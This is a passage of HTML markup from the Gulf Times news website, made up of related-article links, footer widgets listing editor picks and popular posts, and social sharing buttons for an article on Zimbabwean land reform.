                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/09/06/zambia-constitutional-court-dismisses-election-petition/" rel="bookmark" title="Zambia: Constitutional Court Dismisses Election Petition"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/09/00351154:7c1fe886b97ed81b69debc17b8b4fb92:arc614x376:w1200-218x150.png" alt="" title="Zambia: Constitutional Court Dismisses Election Petition"/></a></div>                <a href="http://www.gulftimes.com/international/africa/" class="td-post-category">Africa</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/09/06/zambia-constitutional-court-dismisses-election-petition/" rel="bookmark" title="Zambia: Constitutional Court Dismisses Election Petition">Zambia: Constitutional Court Dismisses Election Petition</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-09-06T02:58:25+00:00"><meta itemprop="headline " content="Zambia: Constitutional Court Dismisses Election Petition"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/09/00351154:7c1fe886b97ed81b69debc17b8b4fb92:arc614x376:w1200.png"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/07/20/terribly-disappointing-if-abbott-is-intending-to-damage-government-morrison-says/" rel="bookmark" title="&#039;Terribly disappointing&#039; if Abbott is intending to damage Government, Morrison says"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/07/5131772-1x1-700x700-218x150.jpg" alt="" title="&#039;Terribly disappointing&#039; if Abbott is intending to damage Government, Morrison says"/></a></div>                <a href="http://www.gulftimes.com/international/australia/" class="td-post-category">Australia</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/07/20/terribly-disappointing-if-abbott-is-intending-to-damage-government-morrison-says/" rel="bookmark" title="&#039;Terribly disappointing&#039; if Abbott is intending to damage Government, Morrison says">&#039;Terribly disappointing&#039; if Abbott is intending to damage Government, Morrison says</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-07-20T14:32:40+00:00"><meta itemprop="headline " content="&#039;Terribly disappointing&#039; if Abbott is intending to damage Government, Morrison says"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2017/07/5131772-1x1-700x700.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/12/23/uganda-over-20-feared-dead-as-boat-capsizes-on-lake-victoria/" rel="bookmark" title="Uganda: Over 20 Feared Dead As Boat Capsizes On Lake Victoria"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/12/00380408:7d8599231e952916ae00120f53252595:arc614x376:w1200-218x150.png" alt="" title="Uganda: Over 20 Feared Dead As Boat Capsizes On Lake Victoria"/></a></div>                <a href="http://www.gulftimes.com/international/africa/" class="td-post-category">Africa</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/12/23/uganda-over-20-feared-dead-as-boat-capsizes-on-lake-victoria/" rel="bookmark" title="Uganda: Over 20 Feared Dead As Boat Capsizes On Lake Victoria">Uganda: Over 20 Feared Dead As Boat Capsizes On Lake Victoria</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-12-23T22:43:25+00:00"><meta itemprop="headline " content="Uganda: Over 20 Feared Dead As Boat Capsizes On Lake Victoria"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/12/00380408:7d8599231e952916ae00120f53252595:arc614x376:w1200.png"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_mx4 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/05/31/opinion-opec-extends-cuts-oil-prices-fall-what-it-means/" rel="bookmark" title="[Opinion] OPEC Extends Cuts, Oil Prices Fall: What It Means"><img width="218" height="150" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/themes/Newspaper/images/no-thumb/td_218x150.png" alt=""/></a></div>                <a href="http://www.gulftimes.com/uae-business/oil-market/" class="td-post-category">Oil Market</a>            </div>

            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/05/31/opinion-opec-extends-cuts-oil-prices-fall-what-it-means/" rel="bookmark" title="[Opinion] OPEC Extends Cuts, Oil Prices Fall: What It Means">[Opinion] OPEC Extends Cuts, Oil Prices Fall: What It Means</a></h3>
            <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-05-31T14:14:45+00:00"><meta itemprop="headline " content="[Opinion] OPEC Extends Cuts, Oil Prices Fall: What It Means"><meta itemprop="interactionCount" content="UserComments:0"/>
        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_5984928ecc6b2" data-td_block_id="td_uid_5_5984928ecc6b2"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_5984928ecc6b2" data-td_block_id="td_uid_5_5984928ecc6b2"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->




<!-- Footer -->

<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <script>var block_td_uid_6_5984928ed192d = new tdBlock();
block_td_uid_6_5984928ed192d.id = "td_uid_6_5984928ed192d";
block_td_uid_6_5984928ed192d.atts = '{"custom_title":"EDITOR PICKS","limit":3,"sort":"featured","class":"td_block_id_160526095 td_uid_6_5984928ed192d_rand"}';
block_td_uid_6_5984928ed192d.td_column_number = "1";
block_td_uid_6_5984928ed192d.block_type = "td_block_7";
block_td_uid_6_5984928ed192d.post_count = "3";
block_td_uid_6_5984928ed192d.found_posts = "3911";
block_td_uid_6_5984928ed192d.header_color = "";
block_td_uid_6_5984928ed192d.ajax_pagination_infinite_stop = "";
block_td_uid_6_5984928ed192d.max_num_pages = "1304";
tdBlocksArray.push(block_td_uid_6_5984928ed192d);
</script><div class="td_block_wrap td_block_7 td_block_id_160526095 td_uid_6_5984928ed192d_rand td-pb-border-top"><h4 class="block-title"><span>EDITOR PICKS</span></h4><div id=td_uid_6_5984928ed192d class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/08/04/what-makes-a-human/" rel="bookmark" title="What Makes a Human?"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/themes/Newspaper/images/no-thumb/td_100x70.png" alt=""/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/08/04/what-makes-a-human/" rel="bookmark" title="What Makes a Human?">What Makes a Human?</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-08-04T15:16:53+00:00" >August 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-08-04T15:16:53+00:00"><meta itemprop="headline " content="What Makes a Human?"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/08/04/titans-camp-good-locker-room-vibes-and-an-even-better-outlook-in-the-afc-south/" rel="bookmark" title="Titans camp: Good locker room vibes and an even better outlook in the AFC South"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/08/marcus-mariota-titans-100x70.jpg" alt="" title="Titans camp: Good locker room vibes and an even better outlook in the AFC South"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/08/04/titans-camp-good-locker-room-vibes-and-an-even-better-outlook-in-the-afc-south/" rel="bookmark" title="Titans camp: Good locker room vibes and an even better outlook in the AFC South">Titans camp: Good locker room vibes and an even better outlook...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-08-04T15:15:40+00:00" >August 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-08-04T15:15:40+00:00"><meta itemprop="headline " content="Titans camp: Good locker room vibes and an even better outlook in the AFC South"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2017/08/marcus-mariota-titans.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2017/08/04/mercedes-needs-to-back-a-horse-in-f1-title-race-red-bull-boss/" rel="bookmark" title="Mercedes needs to &#039;back a horse&#039; in F1 title race &#8211; Red Bull boss"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2017/08/47a21a0af8c962b6ef1e5bebeab2dbd5-100x70.jpg" alt="" title="Mercedes needs to &#039;back a horse&#039; in F1 title race &#8211; Red Bull boss"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2017/08/04/mercedes-needs-to-back-a-horse-in-f1-title-race-red-bull-boss/" rel="bookmark" title="Mercedes needs to &#039;back a horse&#039; in F1 title race &#8211; Red Bull boss">Mercedes needs to &#039;back a horse&#039; in F1 title race &#8211;...</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-08-04T15:11:14+00:00" >August 4, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2017-08-04T15:11:14+00:00"><meta itemprop="headline " content="Mercedes needs to &#039;back a horse&#039; in F1 title race - Red Bull boss"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2017/08/47a21a0af8c962b6ef1e5bebeab2dbd5.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <script>var block_td_uid_7_5984928ed5748 = new tdBlock();
block_td_uid_7_5984928ed5748.id = "td_uid_7_5984928ed5748";
block_td_uid_7_5984928ed5748.atts = '{"custom_title":"POPULAR POSTS","limit":3,"sort":"popular","class":"td_block_id_3264299802 td_uid_7_5984928ed5748_rand"}';
block_td_uid_7_5984928ed5748.td_column_number = "1";
block_td_uid_7_5984928ed5748.block_type = "td_block_7";
block_td_uid_7_5984928ed5748.post_count = "3";
block_td_uid_7_5984928ed5748.found_posts = "3911";
block_td_uid_7_5984928ed5748.header_color = "";
block_td_uid_7_5984928ed5748.ajax_pagination_infinite_stop = "";
block_td_uid_7_5984928ed5748.max_num_pages = "1304";
tdBlocksArray.push(block_td_uid_7_5984928ed5748);
</script><div class="td_block_wrap td_block_7 td_block_id_3264299802 td_uid_7_5984928ed5748_rand td-pb-border-top"><h4 class="block-title"><span>POPULAR POSTS</span></h4><div id=td_uid_7_5984928ed5748 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/10/24/maintenance-moves/" rel="bookmark" title="Maintenance Moves"><img width="92" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/10/7601_MichelleGomez_bw-92x70.jpg" alt="" title="Maintenance Moves"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/10/24/maintenance-moves/" rel="bookmark" title="Maintenance Moves">Maintenance Moves</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-10-24T21:10:39+00:00" >October 24, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-10-24T21:10:39+00:00"><meta itemprop="headline " content="Maintenance Moves"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/10/7601_MichelleGomez_bw.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/02/life-is-strange-review/" rel="bookmark" title="Life is Strange – Review"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/life-is-strange-episode-1-impressions-100x70.jpg" alt="School begins" title="Life is Strange – Review"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/02/life-is-strange-review/" rel="bookmark" title="Life is Strange – Review">Life is Strange – Review</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-02T04:21:57+00:00" >February 2, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-02T04:21:57+00:00"><meta itemprop="headline " content="Life is Strange – Review"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/life-is-strange-episode-1-impressions.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack" itemscope itemtype="http://schema.org/Article">

        <div class="td-module-thumb"><a href="http://www.gulftimes.com/2016/02/02/top-5-pc-games-we-played-in-2015/" rel="bookmark" title="Top 5 PC Games We Played in 2015"><img width="100" height="70" itemprop="image" class="entry-thumb" src="http://www.gulftimes.com/wp-content/uploads/2016/02/maxresdefault-100x70.jpg" alt="Gulf Times Life is Strange" title="Top 5 PC Games We Played in 2015"/></a></div>
        <div class="item-details">
            <h3 itemprop="name" class="entry-title td-module-title"><a itemprop="url" href="http://www.gulftimes.com/2016/02/02/top-5-pc-games-we-played-in-2015/" rel="bookmark" title="Top 5 PC Games We Played in 2015">Top 5 PC Games We Played in 2015</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2016-02-02T04:15:17+00:00" >February 2, 2016</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                            </div>
        </div>
        <meta itemprop="author" content = "Gulf Times"><meta itemprop="datePublished" content="2016-02-02T04:15:17+00:00"><meta itemprop="headline " content="Top 5 PC Games We Played in 2015"><meta itemprop="image" content="http://www.gulftimes.com/wp-content/uploads/2016/02/maxresdefault.jpg"><meta itemprop="interactionCount" content="UserComments:0"/>        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_popular_categories td_block_id_2115879150 td_uid_8_5984928edc427_rand widget widget_categories td-pb-border-top"><h4 class="block-title"><span>POPULAR CATEGORY</span></h4><ul class="td-pb-padding-side"><li><a href="http://www.gulftimes.com/uae-business/qatar/">Qatar<span class="td-cat-no">362</span></a></li><li><a href="http://www.gulftimes.com/uae-business/stock-market/">Stock Market<span class="td-cat-no">259</span></a></li><li><a href="http://www.gulftimes.com/international/">International<span class="td-cat-no">259</span></a></li><li><a href="http://www.gulftimes.com/sport/football/">Football<span class="td-cat-no">257</span></a></li><li><a href="http://www.gulftimes.com/international/australia/">Australia<span class="td-cat-no">256</span></a></li><li><a href="http://www.gulftimes.com/opinion/">Opinion<span class="td-cat-no">256</span></a></li><li><a href="http://www.gulftimes.com/sport/basketball/">Basketball<span class="td-cat-no">252</span></a></li><li><a href="http://www.gulftimes.com/uae-business/">UAE - Business<span class="td-cat-no">245</span></a></li><li><a href="http://www.gulftimes.com/international/africa/">Africa<span class="td-cat-no">243</span></a></li></ul></div> <!-- ./block -->                            </div>
        </div>
    </div>
    <div class="td-footer-bottom-full">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span3"><aside class="footer-logo-wrap"><a href="http://www.gulftimes.com/"><img class="td-retina-data" src="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times-online-nespaper-300x150.png" data-retina="http://www.gulftimes.com/wp-content/uploads/2015/12/gulf-times-online-nespaper-300x150.png" alt=""/></a></aside></div><div class="td-pb-span5"><aside class="footer-text-wrap"><div class="block-title"><span>ABOUT US</span></div>Return next time for more Europe News, Football News, UAE News, Oil Market News and Cultural Information!
<div class="footer-email-wrap">Contact us: <a href="mailto:contact@gulftimes.com">contact@gulftimes.com</a></div></aside></div><div class="td-pb-span4"><aside class="footer-social-wrap td-social-style-2"><div class="block-title"><span>FOLLOW US</span></div><span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/igulftimes" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://twitter.com/gulftimescom" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></aside></div>            </div>
        </div>
    </div>
</div>




<!-- Sub Footer -->


    <div class="td-sub-footer-container">

        <div class="td-container">

            <div class="td-pb-row">

                <div class="td-pb-span7 td-sub-footer-menu">

                        <div class="menu-td-demo-footer-menu-container"><ul id="menu-td-demo-footer-menu" class="td-subfooter-menu"><li id="menu-item-19548" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-19548"><a href="http://www.gulftimes.com/advertise/">Advertise</a></li>
<li id="menu-item-19549" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-19549"><a href="http://www.gulftimes.com/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-19550" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-19550"><a href="http://www.gulftimes.com/disclosure/">Disclosure</a></li>
</ul></div>
                </div>



                <div class="td-pb-span5 td-sub-footer-copy">

                    &copy; Copyright 2015 - By None
                </div>

            </div>

        </div>

    </div>


    </div><!--close content div-->

</div><!--close td-outer-wrap-->



<div class="et_social_pin_images_outer">
					<div class="et_social_pinterest_window">
						<div class="et_social_modal_header"><h3>Pin It on Pinterest</h3><span class="et_social_close"></span></div>
						<div class="et_social_pin_images" data-permalink="http://www.gulftimes.com/2017/08/04/zimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim/" data-title="Zimbabwe: Land Reform &#8211; Mugabe &#039;Getting Undue Credit&#039;, War Vets Claim" data-post_id="33963"></div>
					</div>
				</div><div class="et_social_sidebar_networks et_social_visible_sidebar et_social_slideright et_social_animated et_social_circle et_social_sidebar_flip et_social_mobile_on">
					
					<ul class="et_social_icons_container"><li class="et_social_facebook">
									<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;t=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="facebook" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_facebook"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_twitter">
									<a href="http://twitter.com/share?text=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;via=" class="et_social_share" rel="nofollow" data-social_name="twitter" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_twitter"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_googleplus">
									<a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;t=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="googleplus" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_googleplus"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_pinterest">
									<a href="#" class="et_social_share_pinterest" rel="nofollow" data-social_name="pinterest" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_pinterest"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_linkedin">
									<a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;title=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="linkedin" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_linkedin"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_stumbleupon">
									<a href="http://www.stumbleupon.com/badge?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;title=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="stumbleupon" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_stumbleupon"></i>
										
										
										<span class="et_social_overlay"></span>
									</a>
								</li></ul>
					<span class="et_social_hide_sidebar et_social_icon"></span>
				</div><div class="et_social_mobile_button"></div>
					<div class="et_social_mobile et_social_fadein">
						<div class="et_social_heading">Share This</div>
						<span class="et_social_close"></span>
						<div class="et_social_networks et_social_simple et_social_rounded et_social_left">
							<ul class="et_social_icons_container"><li class="et_social_facebook">
									<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;t=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="facebook" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_facebook"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Facebook</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_twitter">
									<a href="http://twitter.com/share?text=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;via=" class="et_social_share" rel="nofollow" data-social_name="twitter" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_twitter"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Twitter</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_googleplus">
									<a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;t=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="googleplus" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_googleplus"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Google+</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_pinterest">
									<a href="#" class="et_social_share_pinterest" rel="nofollow" data-social_name="pinterest" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_pinterest"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">Pinterest</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_linkedin">
									<a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;title=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="linkedin" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_linkedin"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">LinkedIn</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li><li class="et_social_stumbleupon">
									<a href="http://www.stumbleupon.com/badge?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;title=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="stumbleupon" data-post_id="33963" data-social_type="share" data-location="sidebar">
										<i class="et_social_icon et_social_icon_stumbleupon"></i>
										<div class="et_social_network_label"><div class="et_social_networkname">StumbleUpon</div></div>
										
										<span class="et_social_overlay"></span>
									</a>
								</li></ul>
						</div>
					</div>
					<div class="et_social_mobile_overlay"></div><div class="et_social_flyin et_social_resize et_social_flyin_bottom_right et_social_slideup et_social_trigger_bottom et_social_mobile_on">
					<a href="#" class="et_social_icon et_social_icon_cancel"></a>
					<div class="et_social_header">
						<h3>Share This</h3>
						<p>Share this post with your friends!</p>
					</div>
					<div class="et_social_networks et_social_2col et_social_slide et_social_rounded et_social_left et_social_withnetworknames">
						
						<ul class="et_social_icons_container"><li class="et_social_facebook"><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;t=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="facebook" data-post_id="33963" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_facebook"></i><div class="et_social_network_label"><div class="et_social_networkname">Facebook</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_twitter"><a href="http://twitter.com/share?text=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim&#038;url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;via=" class="et_social_share" rel="nofollow" data-social_name="twitter" data-post_id="33963" data-social_type="share" data-location="flyin"><i class="et_social_icon et_social_icon_twitter"></i><div class="et_social_network_label"><div class="et_social_networkname">Twitter</div></div><span class="et_social_overlay"></span></a></li><li class="et_social_googleplus"><a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.gulftimes.com%2F2017%2F08%2F04%2Fzimbabwe-land-reform-mugabe-getting-undue-credit-war-vets-claim%2F&#038;t=Zimbabwe%3A%20Land%20Reform%20%E2%80%93%20Mugabe%20%27Getting%20Undue%20Credit%27%2C%20War%20Vets%20Claim" class="et_social_share" rel="nofollow" data-social_name="googleplus" data-post_id="33963" 